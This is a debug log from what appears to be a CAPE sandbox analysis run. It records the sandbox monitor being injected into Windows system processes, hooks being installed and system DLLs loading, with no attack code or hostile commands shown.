2026-05-28 19:26:20,944 [root] DEBUG: 9024: DLL loaded at 0x000001E0BEF00000: C:\Windows\System32\CryptoWinRT (0x61000 bytes).
2026-05-28 19:26:21,130 [root] DEBUG: 4712: api-cap: GetSystemMetrics hook disabled due to count: 5000
2026-05-28 19:26:21,190 [root] DEBUG: 9024: DLL loaded at 0x00007FFE67520000: C:\Windows\System32\StateRepository.Core (0xb1000 bytes).
2026-05-28 19:26:21,193 [root] DEBUG: 9024: DLL loaded at 0x00007FFE675E0000: C:\Windows\System32\Windows.StateRepository (0x58e000 bytes).
2026-05-28 19:26:21,197 [root] DEBUG: 9024: DLL loaded at 0x00007FFE5F710000: C:\Windows\System32\TileDataRepository (0x99000 bytes).
2026-05-28 19:26:21,199 [root] DEBUG: 9024: DLL loaded at 0x00007FFE5B080000: C:\Windows\System32\biwinrt (0x53000 bytes).
2026-05-28 19:26:21,302 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6D600000: C:\Windows\System32\usermgrproxy (0x54000 bytes).
2026-05-28 19:26:21,388 [root] DEBUG: 9024: DLL loaded at 0x00007FFE72670000: C:\Windows\System32\dxgi (0xf3000 bytes).
2026-05-28 19:26:21,389 [root] DEBUG: 9024: DLL loaded at 0x00007FFE6FA80000: C:\Windows\System32\d3d11 (0x263000 bytes).
2026-05-28 19:26:21,395 [root] DEBUG: 9024: DLL loaded at 0x00007FFE654C0000: C:\Windows\System32\WININET (0x4d6000 bytes).
2026-05-28 19:26:21,395 [root] DEBUG: 9024: DLL loaded at 0x00007FFE5ADA0000: C:\Windows\System32\windows.internal.shell.broker (0xdd000 bytes).
2026-05-28 19:26:21,690 [root] DEBUG: 4192: CreateProcessHandler: Injection info set for new process 9464: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ImageBase: 0x00007FF6D90F0000
2026-05-28 19:26:21,691 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 9464
2026-05-28 19:26:21,693 [root] DEBUG: 4192: ProcessMessage: Skipping monitoring process 9464
2026-05-28 19:26:21,767 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 9532, handle 0xf50: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
2026-05-28 19:26:21,778 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 9464, handle 0xf50: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
2026-05-28 19:26:21,830 [root] INFO: Process with pid 4192 appears to have terminated
2026-05-28 19:26:21,834 [root] INFO: Process with pid 9024 appears to have terminated
2026-05-28 19:26:21,874 [root] INFO: Announced starting service "b'MicrosoftEdgeElevationService'"
2026-05-28 19:26:21,876 [lib.api.process] INFO: Monitor config for process 672: C:\c6kogbu7\dll\672.ini
2026-05-28 19:26:21,879 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:21,880 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:21,905 [root] DEBUG: Loader: Injecting process 672 with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:21,911 [root] DEBUG: Loader: Copied config file C:\c6kogbu7\dll\672.ini to system path C:\672.ini
2026-05-28 19:26:21,918 [root] DEBUG: Loader: Unable to open process, launched: PPLinject64.exe 672 C:\c6kogbu7\dll\UgBHaqNf.dll
2026-05-28 19:26:21,923 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:21,926 [lib.api.process] INFO: Injected into 64-bit <Process 672 services.exe>
2026-05-28 19:26:21,995 [root] DEBUG: 4712: OpenProcessHandler: Injection info created for process 8744, handle 0xdac: C:\Program Files (x86)\Microsoft\Edge\Application\148.0.3967.83\identity_helper.exe
2026-05-28 19:26:22,066 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 8480: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:22,068 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 8480
2026-05-28 19:26:22,068 [lib.api.process] INFO: Monitor config for process 8480: C:\c6kogbu7\dll\8480.ini
2026-05-28 19:26:22,070 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:22,074 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:22,078 [root] DEBUG: Loader: Injecting process 8480 (thread 8496) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:22,079 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:22,080 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:22,082 [lib.api.process] INFO: Injected into 64-bit <Process 8480 dllhost.exe>
2026-05-28 19:26:22,085 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 8480
2026-05-28 19:26:22,087 [lib.api.process] INFO: Monitor config for process 8480: C:\c6kogbu7\dll\8480.ini
2026-05-28 19:26:22,087 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:22,088 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:22,094 [root] DEBUG: Loader: Injecting process 8480 (thread 8496) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:22,096 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:22,097 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:22,100 [lib.api.process] INFO: Injected into 64-bit <Process 8480 dllhost.exe>
2026-05-28 19:26:22,107 [root] DEBUG: 8480: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:26:22,108 [root] DEBUG: 8480: Interactive desktop enabled.
2026-05-28 19:26:22,110 [root] DEBUG: 8480: Dropped file limit defaulting to 100.
2026-05-28 19:26:22,113 [root] DEBUG: 8480: Disabling sleep skipping.
2026-05-28 19:26:22,122 [root] DEBUG: 8480: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:26:22,137 [root] DEBUG: 8480: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:26:22,138 [root] DEBUG: 8480: YaraScan: Scanning 0x00007FF687D50000, size 0x8026
2026-05-28 19:26:22,140 [root] DEBUG: 8480: Monitor initialised: 64-bit capemon loaded in process 8480 at 0x00007FFE34DD0000, thread 8496, image base 0x00007FF687D50000, stack from 0x000000F84EFA4000-0x000000F84EFB0000
2026-05-28 19:26:22,140 [root] DEBUG: 8480: Commandline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
2026-05-28 19:26:22,152 [root] DEBUG: 8480: hook_api: LdrpCallInitRoutine export address 0x00007FFE766E99BC obtained via GetFunctionAddress
2026-05-28 19:26:22,176 [root] WARNING: b'Unable to create trampoline for LockResource, hook type 2'
2026-05-28 19:26:22,177 [root] DEBUG: 8480: set_hooks: Unable to hook LockResource
2026-05-28 19:26:22,186 [root] DEBUG: 8480: Hooked 627 out of 628 functions
2026-05-28 19:26:22,188 [root] DEBUG: 8480: Syscall hook installed, syscall logging level 1
2026-05-28 19:26:22,193 [root] DEBUG: 8480: RestoreHeaders: Restored original import table.
2026-05-28 19:26:22,194 [root] INFO: Loaded monitor into process with pid 8480
2026-05-28 19:26:22,195 [root] DEBUG: 8480: caller_dispatch: Added region at 0x00007FF687D50000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x00007FF687D512F2, thread 8496).
2026-05-28 19:26:22,196 [root] DEBUG: 8480: YaraScan: Scanning 0x00007FF687D50000, size 0x8026
2026-05-28 19:26:22,198 [root] DEBUG: 8480: ProcessImageBase: Main module image at 0x00007FF687D50000 unmodified (entropy change 0.000000e+00)
2026-05-28 19:26:22,201 [root] DEBUG: 8480: DLL loaded at 0x00007FFE71C90000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2026-05-28 19:26:22,202 [root] DEBUG: 8480: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptPrimitives (0x82000 bytes).
2026-05-28 19:26:22,205 [root] DEBUG: 8480: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:26:22,228 [root] DEBUG: 8480: DLL loaded at 0x00007FFE71770000: C:\Windows\system32\uxtheme (0x9e000 bytes).
2026-05-28 19:26:22,251 [root] DEBUG: 8480: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\shcore (0xad000 bytes).
2026-05-28 19:26:22,252 [root] DEBUG: 8480: DLL loaded at 0x00007FFE605C0000: C:\Windows\System32\thumbcache (0x66000 bytes).
2026-05-28 19:26:22,266 [root] DEBUG: 8480: DLL loaded at 0x00007FFE6F930000: C:\Windows\system32\propsys (0xf6000 bytes).
2026-05-28 19:26:23,325 [root] DEBUG: 4712: OpenProcessHandler: Image base for process 5612 (handle 0xb7c): 0x00007FF7E2400000.
2026-05-28 19:26:23,446 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11224: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:23,447 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11224
2026-05-28 19:26:23,448 [lib.api.process] INFO: Monitor config for process 11224: C:\c6kogbu7\dll\11224.ini
2026-05-28 19:26:23,449 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,452 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,461 [root] DEBUG: Loader: Injecting process 11224 (thread 11228) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,463 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,464 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,466 [lib.api.process] INFO: Injected into 64-bit <Process 11224 dllhost.exe>
2026-05-28 19:26:23,466 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11224
2026-05-28 19:26:23,467 [lib.api.process] INFO: Monitor config for process 11224: C:\c6kogbu7\dll\11224.ini
2026-05-28 19:26:23,468 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,471 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,476 [root] DEBUG: Loader: Injecting process 11224 (thread 11228) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,477 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,478 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,479 [lib.api.process] INFO: Injected into 64-bit <Process 11224 dllhost.exe>
2026-05-28 19:26:23,485 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11288: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:23,486 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11288
2026-05-28 19:26:23,487 [lib.api.process] INFO: Monitor config for process 11288: C:\c6kogbu7\dll\11288.ini
2026-05-28 19:26:23,489 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,491 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,493 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11316: C:\Windows\System32\RuntimeBroker.exe, ImageBase: 0x00007FF7509C0000
2026-05-28 19:26:23,495 [root] INFO: Announced 64-bit process name: RuntimeBroker.exe pid: 11316
2026-05-28 19:26:23,496 [lib.api.process] INFO: Monitor config for process 11316: C:\c6kogbu7\dll\11316.ini
2026-05-28 19:26:23,497 [root] DEBUG: Loader: Injecting process 11288 (thread 11292) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,497 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,498 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,499 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,500 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,500 [lib.api.process] INFO: Injected into 64-bit <Process 11288 dllhost.exe>
2026-05-28 19:26:23,501 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11288
2026-05-28 19:26:23,502 [lib.api.process] INFO: Monitor config for process 11288: C:\c6kogbu7\dll\11288.ini
2026-05-28 19:26:23,502 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,504 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,505 [root] DEBUG: Loader: Injecting process 11316 (thread 11320) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,507 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,508 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,510 [lib.api.process] INFO: Injected into 64-bit <Process 11316 RuntimeBroker.exe>
2026-05-28 19:26:23,510 [root] DEBUG: Loader: Injecting process 11288 (thread 11292) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,511 [root] INFO: Announced 64-bit process name: RuntimeBroker.exe pid: 11316
2026-05-28 19:26:23,512 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,512 [lib.api.process] INFO: Monitor config for process 11316: C:\c6kogbu7\dll\11316.ini
2026-05-28 19:26:23,513 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,513 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,515 [lib.api.process] INFO: Injected into 64-bit <Process 11288 dllhost.exe>
2026-05-28 19:26:23,515 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,520 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11448: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:23,523 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11448
2026-05-28 19:26:23,524 [root] DEBUG: Loader: Injecting process 11316 (thread 11320) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,524 [lib.api.process] INFO: Monitor config for process 11448: C:\c6kogbu7\dll\11448.ini
2026-05-28 19:26:23,524 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2026-05-28 19:26:23,526 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,526 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,527 [lib.api.process] INFO: Injected into 64-bit <Process 11316 RuntimeBroker.exe>
2026-05-28 19:26:23,528 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,532 [root] DEBUG: Loader: Injecting process 11448 (thread 11452) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,533 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,533 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,533 [root] DEBUG: 11316: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:26:23,534 [root] DEBUG: 11316: Interactive desktop enabled.
2026-05-28 19:26:23,534 [lib.api.process] INFO: Injected into 64-bit <Process 11448 dllhost.exe>
2026-05-28 19:26:23,535 [root] DEBUG: 11316: Dropped file limit defaulting to 100.
2026-05-28 19:26:23,535 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11448
2026-05-28 19:26:23,536 [lib.api.process] INFO: Monitor config for process 11448: C:\c6kogbu7\dll\11448.ini
2026-05-28 19:26:23,536 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,537 [root] DEBUG: 11316: Disabling sleep skipping.
2026-05-28 19:26:23,539 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,539 [root] DEBUG: 11316: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:26:23,544 [root] DEBUG: Loader: Injecting process 11448 (thread 11452) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,545 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,546 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,550 [lib.api.process] INFO: Injected into 64-bit <Process 11448 dllhost.exe>
2026-05-28 19:26:23,551 [root] DEBUG: 11316: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:26:23,552 [root] DEBUG: 11316: YaraScan: Scanning 0x00007FF7509C0000, size 0x1b158
2026-05-28 19:26:23,555 [root] DEBUG: 11316: Monitor initialised: 64-bit capemon loaded in process 11316 at 0x00007FFE34DD0000, thread 11320, image base 0x00007FF7509C0000, stack from 0x000000A0816D4000-0x000000A0816E0000
2026-05-28 19:26:23,558 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11612: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:23,559 [root] DEBUG: 11316: Commandline: C:\Windows\System32\RuntimeBroker.exe -Embedding
2026-05-28 19:26:23,559 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11612
2026-05-28 19:26:23,560 [lib.api.process] INFO: Monitor config for process 11612: C:\c6kogbu7\dll\11612.ini
2026-05-28 19:26:23,560 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,562 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,567 [root] DEBUG: Loader: Injecting process 11612 (thread 11616) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,567 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,568 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,572 [lib.api.process] INFO: Injected into 64-bit <Process 11612 dllhost.exe>
2026-05-28 19:26:23,573 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11612
2026-05-28 19:26:23,573 [root] DEBUG: 11316: hook_api: LdrpCallInitRoutine export address 0x00007FFE766E99BC obtained via GetFunctionAddress
2026-05-28 19:26:23,574 [lib.api.process] INFO: Monitor config for process 11612: C:\c6kogbu7\dll\11612.ini
2026-05-28 19:26:23,574 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,576 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,581 [root] DEBUG: Loader: Injecting process 11612 (thread 11616) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,582 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,582 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,585 [lib.api.process] INFO: Injected into 64-bit <Process 11612 dllhost.exe>
2026-05-28 19:26:23,589 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11708: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:23,590 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11708
2026-05-28 19:26:23,591 [lib.api.process] INFO: Monitor config for process 11708: C:\c6kogbu7\dll\11708.ini
2026-05-28 19:26:23,593 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,595 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,598 [root] WARNING: b'Unable to create trampoline for LockResource, hook type 2'
2026-05-28 19:26:23,598 [root] DEBUG: 11316: set_hooks: Unable to hook LockResource
2026-05-28 19:26:23,599 [root] DEBUG: Loader: Injecting process 11708 (thread 11712) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,602 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,603 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,605 [root] DEBUG: 11316: Hooked 627 out of 628 functions
2026-05-28 19:26:23,605 [lib.api.process] INFO: Injected into 64-bit <Process 11708 dllhost.exe>
2026-05-28 19:26:23,606 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11708
2026-05-28 19:26:23,607 [root] DEBUG: 11316: Syscall hook installed, syscall logging level 1
2026-05-28 19:26:23,607 [lib.api.process] INFO: Monitor config for process 11708: C:\c6kogbu7\dll\11708.ini
2026-05-28 19:26:23,607 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,611 [root] DEBUG: 11316: RestoreHeaders: Restored original import table.
2026-05-28 19:26:23,612 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,612 [root] INFO: Loaded monitor into process with pid 11316
2026-05-28 19:26:23,617 [root] DEBUG: 11316: DLL loaded at 0x00007FFE73BF0000: C:\Windows\System32\UMPDC (0x12000 bytes).
2026-05-28 19:26:23,619 [root] DEBUG: 11316: caller_dispatch: Added region at 0x00007FF7509C0000 to tracked regions list (ntdll::NtAllocateVirtualMemoryEx returns to 0x00007FF7509C6182, thread 11320).
2026-05-28 19:26:23,620 [root] DEBUG: Loader: Injecting process 11708 (thread 11712) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,620 [root] DEBUG: 11316: YaraScan: Scanning 0x00007FF7509C0000, size 0x1b158
2026-05-28 19:26:23,621 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,621 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,622 [root] DEBUG: 11316: ProcessImageBase: Main module image at 0x00007FF7509C0000 unmodified (entropy change 0.000000e+00)
2026-05-28 19:26:23,623 [lib.api.process] INFO: Injected into 64-bit <Process 11708 dllhost.exe>
2026-05-28 19:26:23,623 [root] DEBUG: 11316: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptPrimitives (0x82000 bytes).
2026-05-28 19:26:23,625 [root] DEBUG: 11316: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:26:23,627 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 11848: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:26:23,627 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11848
2026-05-28 19:26:23,628 [lib.api.process] INFO: Monitor config for process 11848: C:\c6kogbu7\dll\11848.ini
2026-05-28 19:26:23,629 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,631 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,638 [root] DEBUG: Loader: Injecting process 11848 (thread 11852) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,638 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,639 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,640 [lib.api.process] INFO: Injected into 64-bit <Process 11848 dllhost.exe>
2026-05-28 19:26:23,643 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 11848
2026-05-28 19:26:23,644 [lib.api.process] INFO: Monitor config for process 11848: C:\c6kogbu7\dll\11848.ini
2026-05-28 19:26:23,644 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:26:23,646 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:26:23,651 [root] DEBUG: Loader: Injecting process 11848 (thread 11852) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,651 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:26:23,652 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:26:23,652 [root] DEBUG: 11316: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\SHCORE (0xad000 bytes).
2026-05-28 19:26:23,653 [root] DEBUG: 11316: DLL loaded at 0x00007FFE71770000: C:\Windows\System32\UxTheme (0x9e000 bytes).
2026-05-28 19:26:23,653 [lib.api.process] INFO: Injected into 64-bit <Process 11848 dllhost.exe>
2026-05-28 19:26:23,654 [root] DEBUG: 11316: DLL loaded at 0x00007FFE72670000: C:\Windows\System32\dxgi (0xf3000 bytes).
2026-05-28 19:26:23,654 [root] DEBUG: 11316: DLL loaded at 0x00007FFE6FA80000: C:\Windows\System32\d3d11 (0x263000 bytes).
2026-05-28 19:26:23,655 [root] DEBUG: 11316: DLL loaded at 0x00007FFE6F930000: C:\Windows\System32\PROPSYS (0xf6000 bytes).
2026-05-28 19:26:23,659 [root] DEBUG: 11316: DLL loaded at 0x00007FFE654C0000: C:\Windows\System32\WININET (0x4d6000 bytes).
2026-05-28 19:26:23,660 [root] DEBUG: 11316: DLL loaded at 0x00007FFE5ADA0000: C:\Windows\System32\windows.internal.shell.broker (0xdd000 bytes).
2026-05-28 19:26:23,675 [root] DEBUG: 11316: DLL loaded at 0x00007FFE5C110000: C:\Windows\System32\ShellCommonCommonProxyStub (0xe4000 bytes).
2026-05-28 19:26:23,684 [root] DEBUG: 11316: DLL loaded at 0x00007FFE70740000: C:\Windows\System32\WinTypes (0x155000 bytes).
2026-05-28 19:26:23,687 [root] DEBUG: 11316: DLL loaded at 0x00007FFE68280000: C:\Windows\SYSTEM32\windows.staterepositorycore (0x11000 bytes).
2026-05-28 19:26:23,691 [root] DEBUG: 11316: DLL loaded at 0x00007FFE73720000: C:\Windows\system32\Wldp (0x2d000 bytes).
2026-05-28 19:26:23,692 [root] DEBUG: 11316: DLL loaded at 0x00007FFE71E90000: C:\Windows\system32\windows.storage (0x79b000 bytes).
2026-05-28 19:26:23,701 [root] DEBUG: 11316: DLL loaded at 0x00007FFE72E40000: C:\Windows\System32\msvcp110_win (0x8a000 bytes).
2026-05-28 19:26:23,702 [root] DEBUG: 11316: DLL loaded at 0x00007FFE6E1D0000: C:\Windows\SYSTEM32\policymanager (0xa1000 bytes).
2026-05-28 19:26:23,731 [root] DEBUG: 11316: DLL loaded at 0x00007FFE604C0000: C:\Windows\System32\LINKINFO (0xd000 bytes).
2026-05-28 19:26:23,759 [root] DEBUG: 11316: DLL loaded at 0x00007FFE715E0000: C:\Windows\SYSTEM32\apphelp (0x90000 bytes).
2026-05-28 19:26:23,762 [root] DEBUG: 11316: DLL loaded at 0x00007FFE69670000: C:\Windows\System32\Bcp47Langs (0x5b000 bytes).
2026-05-28 19:26:23,763 [root] DEBUG: 11316: DLL loaded at 0x00007FFE728C0000: C:\Windows\System32\sppc (0x25000 bytes).
2026-05-28 19:26:23,764 [root] DEBUG: 11316: DLL loaded at 0x00007FFE728F0000: C:\Windows\System32\SLC (0x29000 bytes).
2026-05-28 19:26:23,764 [root] DEBUG: 11316: DLL loaded at 0x00007FFE73CA0000: C:\Windows\System32\USERENV (0x2e000 bytes).
2026-05-28 19:26:23,765 [root] DEBUG: 11316: DLL loaded at 0x00007FFE60060000: C:\Windows\System32\appresolver (0x90000 bytes).
